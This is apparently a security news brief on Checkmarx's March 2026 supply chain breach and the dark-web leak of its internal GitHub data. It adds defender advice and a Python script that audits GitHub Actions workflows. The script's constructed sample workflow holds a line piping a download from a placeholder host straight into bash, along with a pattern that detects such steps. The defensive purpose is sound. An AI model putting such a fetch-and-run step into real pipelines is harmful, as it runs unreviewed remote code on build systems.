Checkmarx Confirms Dark Web Leak of GitHub Data Tied to March 2026 Supply Chain Attack
Checkmarx says a cybercriminal group leaked internal GitHub data after a March 2026 supply chain breach. See what was exposed and what defenders should do.

TL;DR
Checkmarx said a cybercriminal group posted its internal GitHub data on the dark web after a March 23, 2026 supply chain attack compromised its repositories. The leaked material includes source code, employee records, API keys, and database credentials, though the firm says no customer data was stored there.
Context
On March 23, 2026, attackers compromised Checkmarx’s software supply chain by tampering with two GitHub Actions workflows and two VS Code extensions distributed via the Open VSX marketplace. The malicious code installed a credential stealer that harvested developer secrets. Threat actor TeamPCP claimed responsibility, and the financially motivated LAPSUS$ group later claimed to have posted Checkmarx‑related data on its leak site. Checkmarx’s investigation found that the exposed data originated from a separate GitHub repository used for internal development, not from its customer‑facing production environment.

Key Facts
- The dark web post contains source code, an employee database, API keys, and MongoDB/MySQL credentials.
- Checkmarx has locked down access to the affected GitHub repository as part of its incident response.
- The company emphasizes that no customer data resides in the repository and will notify stakeholders if that changes.
- Forensic analysis is ongoing to verify the full scope of the leaked material.

What It Means
The incident illustrates how a single compromised build tool can cascade into credential theft and potential further intrusions. Exposed API keys and database credentials could allow attackers to pivot into internal systems or abuse third‑party services. Employee data increases the risk of targeted phishing or social‑engineering campaigns. While customer data appears unaffected, the breach erodes trust in Checkmarx’s own security controls and highlights the need for rigorous supply‑chain hygiene.

What Defenders Should Do
- Rotate all API keys, secrets, and credentials stored in the affected repository immediately.
- Audit GitHub Actions workflows and third‑party extensions for unauthorized changes; enforce signed commits and require approvals for workflow edits (MITRE ATT&CK T1195.002).
- Enable multi‑factor authentication and least‑privilege access for all developer accounts (T1078.004).
- Deploy detection rules for known credential‑stealer indicators (e.g., suspicious PowerShell or JavaScript execution, T1059.007).
- Review software bill of materials (SBOM) for all dependencies and apply patches for vulnerable components as advisories are released.
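As an added example (not Checkmarx's tooling and not taken from the incident write-up), the following Python script shows one way to operationalize the workflow-audit item above: it flags `uses:` references that are not pinned to a full 40-character commit SHA, flags `run:` steps that pipe a download straight into a shell, and compares a workflow's SHA-256 digest against a stored baseline so that an unreviewed edit to a workflow file stands out. It uses only the standard library. The two sample workflows, the `example.invalid` URL, and both commit SHAs in them are constructed placeholders, not real commits.

```python
"""Audit GitHub Actions workflow text for weak supply-chain hygiene.

Added example, not Checkmarx's or GitHub's tooling. Standard library only,
so it operates on raw workflow text without a YAML dependency. The sample
workflows and the commit SHAs below are constructed placeholders.
"""
import hashlib
import re
from dataclasses import dataclass

FULL_SHA = re.compile(r"^[0-9a-f]{40}$")
USES_LINE = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)", re.MULTILINE)
RUN_LINE = re.compile(r"^(\s*)-?\s*run:\s*(.*)$")
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba)?sh\b")


@dataclass
class Finding:
    kind: str    # "unpinned" or "pipe-to-shell"
    detail: str  # the offending action reference or command


def run_commands(text):
    """Yield the shell text of each `run:` step, including `run: |` block scalars."""
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        m = RUN_LINE.match(lines[i])
        if not m:
            i += 1
            continue
        indent, rest = len(m.group(1)), m.group(2).strip()
        if rest in ("|", ">", "|-", ">-"):
            # Block scalar: collect the more deeply indented lines that follow.
            block = []
            i += 1
            while i < len(lines) and (
                not lines[i].strip() or len(lines[i]) - len(lines[i].lstrip()) > indent
            ):
                block.append(lines[i].strip())
                i += 1
            yield "\n".join(block).strip()
        else:
            yield rest
            i += 1


def audit_workflow(text):
    """Return findings for unpinned actions and download-and-execute steps."""
    findings = []
    for m in USES_LINE.finditer(text):
        ref = m.group(1)
        if ref.startswith(("./", "docker://")):
            continue  # local and container references are out of scope here
        _, _, version = ref.rpartition("@")  # no "@" at all is also unpinned
        if not FULL_SHA.match(version):
            findings.append(Finding("unpinned", ref))
    for cmd in run_commands(text):
        if PIPE_TO_SHELL.search(cmd):
            findings.append(Finding("pipe-to-shell", cmd))
    return findings


def workflow_digest(text):
    """SHA-256 of the workflow text; record this when the file is reviewed and approved."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def changed_since_baseline(text, baseline_digest):
    """True if the workflow no longer matches the approved baseline digest."""
    return workflow_digest(text) != baseline_digest


# Constructed sample: a floating tag and a curl-pipe-to-shell install step.
SAMPLE_WORKFLOW = """\
name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@b39b52d1213e96004bfcb1c61a8a6fa8ab84f3e8
      - name: install helper
        run: |
          curl -sSL https://example.invalid/install.sh | bash
      - run: npm ci
"""

# Same workflow with the action pinned to a (placeholder) commit SHA and the
# download-and-execute step replaced by a plain package install.
HARDENED_WORKFLOW = SAMPLE_WORKFLOW.replace(
    "actions/checkout@v4", "actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b"
).replace("curl -sSL https://example.invalid/install.sh | bash", "npm ci --ignore-scripts")


if __name__ == "__main__":
    for f in audit_workflow(SAMPLE_WORKFLOW):
        print(f"{f.kind}: {f.detail}")
    baseline = workflow_digest(HARDENED_WORKFLOW)
    print("drift from baseline:", changed_since_baseline(SAMPLE_WORKFLOW, baseline))
```

Run against a checkout of `.github/workflows/`, the digest check is the cheap part: store the digest of each reviewed workflow alongside the approval record and alert when a push changes the file without a matching review, which complements the required-approval branch rule rather than replacing it.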
Watch for any follow‑up notifications from Checkmarx regarding customer data, additional dark‑web postings, or advisories from CISA related to the Trivy‑style supply chain compromise.